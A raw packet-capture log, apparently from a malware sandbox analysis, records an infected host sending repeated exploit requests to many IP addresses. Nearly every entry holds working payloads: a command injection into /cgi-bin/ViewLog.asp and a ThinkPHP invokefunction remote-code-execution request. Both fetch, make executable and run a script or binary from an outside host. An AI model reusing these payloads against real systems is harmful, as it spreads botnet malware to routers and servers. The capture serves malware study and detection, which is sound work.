                                                        Apr 14, 2024 16:36:11.319037914 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:12.283826113 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:14.203633070 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:18.106756926 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:25.785708904 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:41.143570900 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:12.115350962 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        476192.168.2.235541694.123.112.838080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:11.347879887 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        477192.168.2.235827862.29.0.1178080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:11.348696947 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        478192.168.2.235214631.200.122.798080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:11.349221945 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        479192.168.2.235740088.183.165.21380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:11.420212984 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        480192.168.2.235809688.215.215.15780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:11.420619965 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        481192.168.2.233403088.119.193.24680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:11.438117027 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:11.757352114 CEST242INHTTP/1.0 400 Bad Request
                                                        Connection: close
                                                        Content-Length: 113
                                                        Date: Sun, 14 Apr 2024 14:35:57 GMT
                                                        Expires: 0
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        482192.168.2.235193288.135.184.15580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:11.441931009 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:11.764138937 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:11 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        483192.168.2.234502685.122.199.138080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.013619900 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        484192.168.2.233625094.122.105.558080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.050838947 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        485192.168.2.236070494.122.93.2468080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.054220915 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        486192.168.2.235712031.12.74.118080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.055253029 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:13.400351048 CEST549INHTTP/1.1 302 Moved Temporarily
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:36:13 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                                        Expires: Sun, 14 Apr 2024 14:36:13 GMT
                                                        Cache-Control: max-age=0
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                        X-Frame-Options: SAMEORIGIN
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        487192.168.2.234884631.200.123.2398080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.063740969 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        488192.168.2.2348056112.125.164.10880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.107223988 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:13.447123051 CEST188INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:10 GMT
                                                        Server: Apache
                                                        Content-Length: 11
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        489192.168.2.233315231.136.214.1808080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.331134081 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:14.299623966 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:16.219122887 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:20.154484987 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:27.833400011 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:43.191329956 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:14.162990093 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        490192.168.2.235485662.28.85.1788080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:13.375900984 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:13.700408936 CEST1175INHTTP/1.1 404 Not Found
                                                        Server: Apache-Coyote/1.1
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 1012
                                                        Date: Sun, 14 Apr 2024 14:29:53 GMT
